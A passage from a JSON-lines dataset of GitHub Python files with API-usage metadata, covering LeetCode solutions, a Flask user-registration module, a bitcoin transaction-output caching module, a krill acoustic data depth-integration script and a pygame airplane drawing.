"streamlit.sidebar", "line_number": 36, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 37, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 38, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 38, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 40, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 40, "usage_type": "attribute"}, {"api_name": "streamlit.dataframe", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 42, "usage_type": "call"}, {"api_name": "plotly.express.area", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 46, "usage_type": "name"}, {"api_name": "plotly.express.scatter", "line_number": 47, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 47, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 48, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 48, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 49, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 49, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 52, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 54, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 55, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 59, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.checkbox", "line_number": 63, "usage_type": "call"}, {"api_name": "plotly.express.sunburst", "line_number": 64, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 64, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 65, "usage_type": "call"}, {"api_name": "plotly.express.sunburst", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.express.treemap", "line_number": 68, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 68, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 69, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 69, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 71, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 72, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 72, "usage_type": "name"}, {"api_name": "plotly.express.histogram", "line_number": 73, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 73, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 74, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 75, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express.violin", "line_number": 77, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 77, "usage_type": "name"}, {"api_name": "plotly.express.violin", "line_number": 78, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 78, "usage_type": "name"}, {"api_name": "streamlit.checkbox", "line_number": 79, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.plotly_chart", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "5868672374", "text": "from collections import deque\n\n\nclass MovingAverage:\n\n def __init__(self, size: int):\n self.q = deque()\n self.s = size\n\n def next(self, val: int) -> float:\n if len(self.q) >= self.s:\n self.q.pop()\n self.q.appendleft(val)\n return sum(self.q) / len(self.q)\n\n# Your MovingAverage object will be instantiated and called as such:\n# obj = MovingAverage(size)\n# param_1 = obj.next(val)", "repo_name": "vramanrs/Leetcode-python", "sub_path": "moving-average-from-data-stream.py", "file_name": "moving-average-from-data-stream.py", "file_ext": "py", "file_size_in_byte": 430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "70418661635", "text": "\"\"\"\nCollection of all business logic the application must be able to\nperform.\n\"\"\"\nfrom contextlib import contextmanager\nfrom sqlalchemy.exc import IntegrityError\nfrom database import Session\nfrom models import User\n\n\n@contextmanager\ndef session_scope():\n \"\"\"\n Context for dealing with sessions. This allows the developer not to have to\n worry perse about closing and creating the session.\n \"\"\"\n session = Session()\n try:\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n\ndef name_registered(name):\n \"\"\"\n Confirm or deny the uniqueness of the given user in the database.\n \"\"\"\n with session_scope() as session:\n if session.query(User).filter(User.name == name).one_or_none():\n return True\n return False\n\n\ndef email_registered(email):\n \"\"\"\n Confirm or deny the uniqueness of the given email in the database.\n \"\"\"\n with session_scope() as session:\n if session.query(User).filter(User.email == email).one_or_none():\n return True\n return False\n\n\ndef register_user(name, email):\n \"\"\"\n Register a user in the database by a name and email.\n \"\"\"\n with session_scope() as session:\n new_user = User(name, email)\n session.add(new_user)\n try:\n session.commit()\n except IntegrityError:\n session.rollback()\n raise\n else:\n return new_user.id\n ", "repo_name": "Drvanon/FlaskBoilerplate", "sub_path": "controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 1499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "database.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 11, "usage_type": "name"}, {"api_name": "models.User", "line_number": 33, "usage_type": "argument"}, {"api_name": "models.User.name", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 43, "usage_type": "argument"}, {"api_name": "models.User.email", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.IntegrityError", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "14958532073", "text": "\"\"\"\nA chef has collected data on the satisfaction level of his n dishes. Chef can cook any dish in 1 unit of time.\n\nLike-time coefficient of a dish is defined as the time taken to cook that dish including previous dishes multiplied\nby its satisfaction level i.e. time[i] * satisfaction[i].\n\nReturn the maximum sum of like-time coefficient that the chef can obtain after dishes preparation.\n\nDishes can be prepared in any order and the chef can discard some dishes to get this maximum value.\n\n\n\nExample 1:\n\nInput: satisfaction = [-1,-8,0,5,-9] Output: 14 Explanation: After Removing the second and last dish, the maximum\ntotal like-time coefficient will be equal to (-1*1 + 0*2 + 5*3 = 14). Each dish is prepared in one unit of time.\nExample 2:\n\nInput: satisfaction = [4,3,2]\nOutput: 20\nExplanation: Dishes can be prepared in any order, (2*1 + 3*2 + 4*3 = 20)\nExample 3:\n\nInput: satisfaction = [-1,-4,-5]\nOutput: 0\nExplanation: People do not like the dishes. No dish is prepared.\n\n\nConstraints:\n\nn == satisfaction.length\n1 <= n <= 500\n-1000 <= satisfaction[i] <= 1000\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def maxSatisfaction(self, satisfaction: List[int]) -> int:\n # Like-time coefficient of a dish is defined as the time taken to cook that dish including previous dishes\n # multiplied by its satisfaction level i.e. time[i] * satisfaction[i].\n\n max_satisfaction = sorted(satisfaction, reverse=True)\n\n # result -> sum of time to cook the positive reviewed dish [Note: +ve -> positive like time to cook same dish\n # considering previous time to cook the previous dish]\n # like time -> it is like time coefficient of the dish prepared by chef in a day[given satisfaction array]\n result, like_time = 0, 0\n\n # loop throughout dish time in list.\n for dish_time in max_satisfaction:\n\n # like time -> if positive, add time to like time coefficient to given dish time\n like_time += dish_time\n\n # like time -> if negative, then there is no need of consideration\n if like_time < 0:\n break\n\n # result -> add result to like time coefficient\n result += like_time\n\n return result\n\n\nsolution = Solution()\nassert 14 == solution.maxSatisfaction(satisfaction=[-1, -8, 0, 5, -9])\nassert 20 == solution.maxSatisfaction(satisfaction=[4, 3, 2])\nassert 0 == solution.maxSatisfaction(satisfaction=[-1, -4, -5])\n", "repo_name": "ImSakunthala/leetcode", "sub_path": "Advance_level/reducing_dishes.py", "file_name": "reducing_dishes.py", "file_ext": "py", "file_size_in_byte": 2450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "35825932627", "text": "from collections import OrderedDict\n\n\nfrom bitcoin.core import str_money_value, b2lx, b2x, x\nfrom bitcoin.wallet import CBitcoinAddress, CBitcoinAddressError\nfrom bitcoin.rpc import unhexlify, hexlify\nfrom bitcoin.core import COutPoint\n\nfrom .exceptions import ChainError, BacktrackError\n\nCOINBASE_TX = b'\\x00'*32\n\ndef bitcoin_to_string(value):\n \"\"\"Convert bitcoin value to a string\"\"\"\n #TODO: Append zeroes up to standard length\n bitcoin_str = str_money_value(abs(value))\n if value < 0:\n return '- '+bitcoin_str\n else:\n return bitcoin_str\n\n\n\nclass TxOut(object):\n \"\"\"Transaction ouput\"\"\"\n __slots__ = ('tx', 'nout', 'addr', 'value')\n\n def __init__(self, tx, nout, addr=None, value=0):\n \"\"\"\n Arguments:\n tx (string): Transaction hash\n nout (int): Transaction output number\n addr (string):\n value (int): Output value\n \"\"\"\n self.tx = tx\n self.nout = nout\n self.addr = addr\n self.value = value\n\n @staticmethod\n def addr_from_script(script):\n \"\"\"Generate output addres from scriptPubKey\"\"\"\n try:\n addr = str(CBitcoinAddress.from_scriptPubKey(script))\n except CBitcoinAddressError:\n addr = None\n \n return addr\n\n @classmethod\n def from_tx(cls, tx, nout):\n \"\"\"\n WARNING: This is not efficient to process all the transaction outputs\n because of GetTxid() does not cache the result.\n\n Arguments:\n tx (bitcoin.CTransaction): Transaction\n nout (int): Output number\n\n Returns:\n Inialized TxOut\n\n Exceptions:\n CBitcoinAddressError: Couldn't convert transaction output scriptPubKey \n to address\n IndexError: The requested output doesn't exist\n \"\"\"\n # GetTxid instead of GetHash for segwit support (bip-0141)\n txhash = tx.GetTxid()\n cout = tx.vout[nout]\n addr = TxOut.addr_from_script(cout.scriptPubKey)\n return cls(txhash, nout, addr, value=cout.nValue)\n\n def __hash__(self):\n return hash((self.tx, self.nout))\n\n def __eq__(self, other):\n if not isinstance(other, type(self)):\n return False\n return self.tx == other.tx and self.nout == other.nout\n \n def __repr__(self):\n return \"TxOut({}, {}, {}, {})\".format(\n self.tx, \n self.nout, \n self.addr, \n self.value)\n\n def __str__(self): \n return \"TxOut({}, {}, {}, {})\".format(\n b2x(self.tx), \n self.nout, \n self.addr, \n str_money_value(self.value))\n\n\n\nclass Block(object):\n\n __slots__=('block_hash', 'height', 'vin', 'vout')\n\n def __init__(self, block_hash, height, vin=None, vout=None):\n \n self.block_hash = block_hash\n self.height = height\n if not vin:\n vin = []\n if not vout:\n vout = []\n\n self.vin = list(vin)\n self.vout = list(vout)\n\n def __hash__(self):\n return hash(self.block_hash)\n\n def __eq__(self, other):\n if isintance(other, self.__class__):\n return self.block_hash==other.block_hash\n else:\n return False\n\n def __repr__(self):\n return \"{}({},{},{},{})\".format(self.__class__.__name__,\n self.block_hash,\n self.height,\n self.vin,\n self.vout)\n\n def __str__(self):\n return \"{}: {} ({})\".format(self.__class__.__name,\n self.block_hash,\n self.height)\n\n def check_balance(self):\n \"\"\"Check block input value sum is equeal to output value sum\"\"\"\n input_value=0\n output_value=0\n\n for vin in self.vin:\n input_value += vin.value\n\n for vout in self.vout:\n output_value += vout.value\n\n return input_value == output_value\n\n\nclass TxOutCache(object):\n \n def __init__(self, proxy, size=500000):\n \"\"\"\n Arguments:\n size (int): max cache size\n proxy (proxy.BitcoindProxy)\n \"\"\"\n self._proxy = proxy\n self._max_size = size\n\n self._txout_cache = OrderedDict()\n\n self._cache_miss = 0\n self._cache_hit = 0\n\n def del_txout(self, txout):\n \"\"\"Remove txout from cache\"\"\"\n self._txout_cache.pop(txout, None)\n \n def add_txout(self, txout):\n \"\"\"Add TxOut to cache\"\"\"\n if len(self._txout_cache)>=self._max_size:\n self._txout_cache.popitem(last=False)\n \n self._txout_cache[txout] = txout\n\n def purge_cache(self):\n \"\"\"Purge complete cache\"\"\"\n self._txout_cache = OrderedDict()\n\n def get_txout(self, txhash, nout):\n \"\"\"\n Get TxOut from cache or if not available query bitcoind_proxy\n \n Arguments:\n txhash (str): Transactions hash\n nout (int): Output number\n \"\"\"\n try:\n txout = self._txout_cache[TxOut(txhash, nout)]\n self._cache_hit += 1\n return txout\n except KeyError:\n pass\n\n self._cache_miss += 1\n\n with self._proxy as proxy: \n try:\n tx = proxy.get_transaction(txhash)\n except ConnectionError:\n raise\n except Exception:\n raise ChainError(\"Unknown Txout {} {}\".format(txhash, nout))\n \n # Manually initilize TxOut so there is no need to generate the transaction\n # hash a second time. (faster than:txout = TxOut.from_tx(rawtx, nout))\n for out, cout in enumerate(tx.vout):\n addr = TxOut.addr_from_script(cout.scriptPubKey)\n self.add_txout(TxOut(txhash, out, addr, value=cout.nValue))\n\n # Now txout must be in cache\n self._cache_hit -= 1 # Fix hit/miss counter\n return self.get_txout(txhash, nout)\n \n\nclass BlockFactory(object):\n\n def __init__(self, proxy, size=1000000):\n \"\"\"\n Arguments:\n size (int): max cache size\n proxy (proxy.BitcoindProxy)\n \"\"\"\n self._proxy = proxy\n self._max_size = size\n \n self._cache = TxOutCache(proxy, size)\n\n def purge_cache(self):\n \"\"\"Completely purge cache\"\"\"\n self._cache.purge()\n\n def _transaction_inputs(self, tx):\n \"\"\"Generate transaction inputs from source transaction outputs\"\"\" \n inputs = []\n txhash = tx.GetTxid()\n \n for vin in tx.vin:\n txin = vin.prevout\n \n if txin.hash == COINBASE_TX:\n continue\n\n txout = self._cache.get_txout(txin.hash, txin.n)\n if txout is None:\n logger.error(\"Unable to find TxOut {} {}\".format(\n txin_hash, txin_n))\n else:\n inputs.append(txout)\n\n return inputs\n\n def _transaction_outputs(self, tx):\n \"\"\"Generate transaction TxOut\"\"\" \n outputs = []\n\n # GetTxid instead of GetHash for segwit support (bip-0141)\n txhash = tx.GetTxid()\n\n for n, utxo in enumerate(tx.vout): \n \n addr = TxOut.addr_from_script(utxo.scriptPubKey)\n out = TxOut(txhash, n, addr, value=utxo.nValue)\n outputs.append(out)\n\n return outputs\n\n def _block_outputs(self, block):\n \"\"\"Generate the TxOut for all the block outputs\"\"\"\n block_txouts = []\n\n for tx in block.vtx:\n block_txouts.extend(self._transaction_outputs(tx))\n \n return block_txouts\n\n def _block_inputs(self, block):\n \"\"\"Generate the TxOut for all the block inputs\"\"\"\n block_inputs = []\n\n for tx in block.vtx:\n block_inputs.extend(self._transaction_inputs(tx))\n\n return block_inputs\n\n def build_block(self, block, height=None):\n \"\"\"Build Block from bitcoin.CBlock\"\"\"\n blockhash = block.GetHash()\n \n \n outputs = self._block_outputs(block)\n \n # Add outputs to cache, because the outputs from a transaction\n # can be used as inputs for other transactions in the same block\n for txout in outputs:\n if txout.value > 0:\n self._cache.add_txout(txout)\n\n # Generate inputs \n inputs = self._block_inputs(block)\n #TODO: Remove outputs added to cache if input generations fails???\n\n\n # With the complete block remove used inputs from cache to save space\n #for txout in inputs:\n # self._cache.del_txout(txout)\n\n block = Block(blockhash, height, inputs, outputs)\n return block\n", "repo_name": "secnot/bitcoin-balance", "sub_path": "bitbalance/primitives.py", "file_name": "primitives.py", "file_ext": "py", "file_size_in_byte": 8913, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bitcoin.core.str_money_value", "line_number": 16, "usage_type": "call"}, {"api_name": "bitcoin.wallet.CBitcoinAddress.from_scriptPubKey", "line_number": 45, "usage_type": "call"}, {"api_name": "bitcoin.wallet.CBitcoinAddress", "line_number": 45, "usage_type": "name"}, {"api_name": "bitcoin.wallet.CBitcoinAddressError", "line_number": 46, "usage_type": "name"}, {"api_name": "bitcoin.core.b2x", "line_number": 92, "usage_type": "call"}, {"api_name": "bitcoin.core.str_money_value", "line_number": 95, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 161, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 179, "usage_type": "call"}, {"api_name": "exceptions.ChainError", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "43038497878", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef final_depth_integrate(finname,foutname):\n \n #jupyter nbconvert --to script final_depth_integrate.ipynb \n # Use the above script in a Terminal Window to convert to a .py file\n\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n import statistics as st\n import time as time\n\n from IPython.core.interactiveshell import InteractiveShell\n InteractiveShell.ast_node_interactivity = \"last\"\n #other options include 'none', 'last', 'last_expr'\n\n df1=pd.read_csv(finname) \n\n df2=df1.copy(deep=True)\n df2.drop(df2[df2[' Layer']!=2].index, inplace=True)\n df2=df2.reset_index(drop=True)\n \n df1=df1.replace([-9999.0, 9999.0, -999.0, 999.0], np.nan)\n df2=df2.replace([-9999.0, 9999.0, -999.0, 999.0], np.nan)\n #df1=df1.replace(9999.0, np.nan)\n #df2=df2.replace(-9999.0, np.nan)\n #df2=df2.replace(9999.0, np.nan)\n\n df1_interval=np.nanmax(df1[' Interval'])\n df2_interval=np.nanmax(df2[' Interval'])\n mx_interval_int=int(df1_interval)\n\n #Check that the number or instances with data (# of intervals) equals the number of rows in df2\n if len(np.unique(df1[' Interval'])) != len(df2.index):\n print('Mismatch in Length of Files!!! ' +finname+ ' NOT processed') \n else: \n bad_value=-9998\n tic=time.time()\n cnt=0 #Counter is needed in case interval is not sequential in the original csv file\n for i in range (mx_interval_int+1):\n if any(df1[' Interval']==i):\n #print(i)\n loar=df1[' Interval']==i\n #idx=loar[loar==True].index[-1] #Maybe Not Needed\n #df2[' NASC'][i]=sum((df1[' NASC'])[loar]) #THis Created Warnings! Better to use iloc like below\n\n df2.iloc[cnt,df2.columns.get_loc(' Sv_mean')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' NASC')]=sum((df1[' NASC'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Sv_max')]=np.nanmax((df1[' Sv_max'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Sv_min')]=np.nanmin((df1[' Sv_min'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Sv_noise')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' NASC_noise')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Height_mean')]=sum((df1[' Height_mean'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Depth_mean')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Samples')]=sum((df1[' Samples'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Layer_depth_max')]=np.nanmax((df1[' Layer_depth_max'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Layer_depth_min')]=np.nanmin((df1[' Layer_depth_min'])[loar])\n\n df2.iloc[cnt,df2.columns.get_loc(' Standard_deviation')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Skewness')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Kurtosis')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' ABC')]=sum((df1[' ABC'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Area_Backscatter_Strength')]=bad_value\n\n df2.iloc[cnt,df2.columns.get_loc(' Thickness_mean')]=sum((df1[' Thickness_mean'])[loar])\n df2.iloc[cnt,df2.columns.get_loc(' Range_mean')]=bad_value\n df2.iloc[cnt,df2.columns.get_loc(' Beam_volume_sum')]=sum((df1[' Beam_volume_sum'])[loar])\n cnt=cnt+1\n #tmp_date=df[' Date_M'][loar]\n #f_time.append((df[' Time_M'])[loar])\n toc=time.time()\n elapsed=toc-tic\n #print(elapsed)\n \n df2=df2.fillna(value=-9999.0)\n df2\n df2.to_csv (foutname, index = False, header=True)\n print('Writing ' +foutname+ ' with ' +str(len(df2.index))+ ' rows.') \n print('Processing took ' +str(elapsed)+ ' seconds.')\n print('')\n \n #import csv\n #csvData=[f_lon, f_lat, f_nasc]\n\n #zipped=zip(f_date,f_time,f_lon, f_lat, f_nasc)\n #zipped=zip(f_time,f_lon, f_lat, f_nasc)\n\n #with open('test.csv', 'w') as csvFile:\n # writer=csv.DictWriter(csvFile, fieldnames=[\"Time\",\"Lon_M\",\"Lat_M\",\"NASC\"])\n # writer.writeheader()\n # writer = csv.writer(csvFile)\n #writer.writeheader\n # writer.writerows(zipped)\n\n #csvFile.close()\n\n #type(f_lon)\n \n\n", "repo_name": "jeffdorman/krill_biomass", "sub_path": "programs/krill_biomass_processing/final_depth_integrate.py", "file_name": "final_depth_integrate.py", "file_ext": "py", "file_size_in_byte": 4369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "IPython.core.interactiveshell.InteractiveShell.ast_node_interactivity", "line_number": 19, "usage_type": "attribute"}, {"api_name": "IPython.core.interactiveshell.InteractiveShell", "line_number": 19, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "15858724367", "text": "import pygame, sys, random\r\nimport numpy as np\r\n\r\nclass Main:\r\n def __init__(self, fps=60, screen_resolution=()):\r\n self.fps = fps\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((1080,720))\r\n self.clock = pygame.time.Clock()\r\n self.display_width, self.display_height = pygame.display.Info().current_w, pygame.display.Info().current_h\r\n self.bool_pos = 0\r\n self.x = 5\r\n self.conter = 0\r\n #0 - Левое Крыло; 2 - Правое крыло; 1 - Основа; 3 - Заднее Левое Крыло; 4 - Заднее Правое Крыло\r\n self.list_0_coordinates = [[215, 100], [255, 100],\r\n [365, 307], [265, 310]]\r\n self.list_2_coordinates = [[215, 560], [255, 560],\r\n [365, 353], [265, 350]]\r\n self.list_3_coordinates = [[0, 250], [20, 250],\r\n [90, 330], [30, 330]]\r\n self.list_4_coordinates = [[0, 410], [20, 410],\r\n [90, 330], [30, 330]]\r\n self.list_1_coordinates = [[505, 330], [495, 345], [480, 360],\r\n [50, 345], [30, 330],\r\n [50, 315], [480, 300],[495, 315]]\r\n self.p_list = [self.list_0_coordinates, self.list_1_coordinates, self.list_2_coordinates, self.list_3_coordinates, self.list_4_coordinates]\r\n #Тут Отрисовка перед циклом\r\n\r\n def run_while(self):\r\n while True:\r\n self.conter += 1\r\n if not self.bool_pos:\r\n self.drawing_in_a_loop()\r\n self.event_handler()\r\n pygame.display.flip()\r\n self.clock.tick(self.fps)\r\n\r\n def event_handler(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN :\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_SPACE:\r\n self.bool_pos = 0\r\n if event.type == pygame.MOUSEBUTTONDOWN :\r\n self.pos = event.pos\r\n for p in self.p_list:\r\n if self.point_in_polygon(p, self.pos):\r\n self.fire()\r\n self.bool_pos = not self.bool_pos\r\n break\r\n #print(self.pos)\r\n #if self.pos\r\n\r\n def drawing_in_a_loop(self):\r\n if self.list_4_coordinates[0][0] >= pygame.display.Info().current_w:\r\n self.list_0_coordinates = [[-290, 100], [-250, 100], [-140, 307], [-240, 310]]\r\n self.list_2_coordinates = [[-290, 560], [-250, 560], [-140, 353], [-240, 350]]\r\n self.list_3_coordinates = [[-505, 250], [-485, 250], [-415, 330], [-475, 330]]\r\n self.list_4_coordinates = [[-505, 410], [-485, 410], [-415, 330], [-475, 330]]\r\n self.list_1_coordinates = [[0, 330], [-10, 345], [-25, 360], [-455, 345],\r\n [-475, 330], [-455, 315], [-25, 300], [-10, 315]]\r\n self.p_list = [self.list_0_coordinates, self.list_1_coordinates, self.list_2_coordinates, self.list_3_coordinates, self.list_4_coordinates]\r\n\r\n self.screen.fill((125,249,255))\r\n for i in range(len(self.list_0_coordinates)):\r\n self.list_0_coordinates[i][0] += self.x\r\n for i in range(len(self.list_1_coordinates)):\r\n self.list_1_coordinates[i][0] += self.x\r\n for i in range(len(self.list_2_coordinates)):\r\n self.list_2_coordinates[i][0] += self.x\r\n for i in range(len(self.list_3_coordinates)):\r\n self.list_3_coordinates[i][0] += self.x\r\n for i in range(len(self.list_4_coordinates)):\r\n self.list_4_coordinates[i][0] += self.x\r\n\r\n pygame.draw.lines(self.screen, \"black\", True, self.list_0_coordinates, 5)\r\n pygame.draw.lines(self.screen, \"black\", True, self.list_2_coordinates, 5)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_0_coordinates)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_2_coordinates)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_3_coordinates)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_4_coordinates)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_3_coordinates, 5)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_4_coordinates, 5)\r\n pygame.draw.polygon(self.screen, (181,184,187), self.list_1_coordinates)\r\n pygame.draw.aalines(self.screen, \"black\", True, self.list_1_coordinates, 5)\r\n\r\n def point_in_polygon(self, p, point):\r\n result = False\r\n size = len(p)\r\n j = size - 1\r\n for i in range(size):\r\n if (p[i][1] < point[1] and p[j][1] >= point[1] or p[j][1] < point[1]\r\n and p[i][1] >= point[1]) and (p[i][0] + (point[1] - p[i][1]) / (p[j][1] - p[i][1]) * (p[j][0] - p[i][0]) < point[0]):\r\n result = not result\r\n j = i\r\n return result\r\n\r\n def fire(self):\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 3)\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 7, 1)\r\n pygame.draw.circle(self.screen, \"red\", self.pos, 9, 1)\r\n\r\nMain(24).run_while()\r\n", "repo_name": "fevzifevziev/Computer_Graphics", "sub_path": "lab_5/5.02.py", "file_name": "5.02.py", "file_ext": "py", "file_size_in_byte": 5480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.display.Info", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.K_SPACE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.display.Info", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.draw.polygon", "line_number": 85, "usage_type": 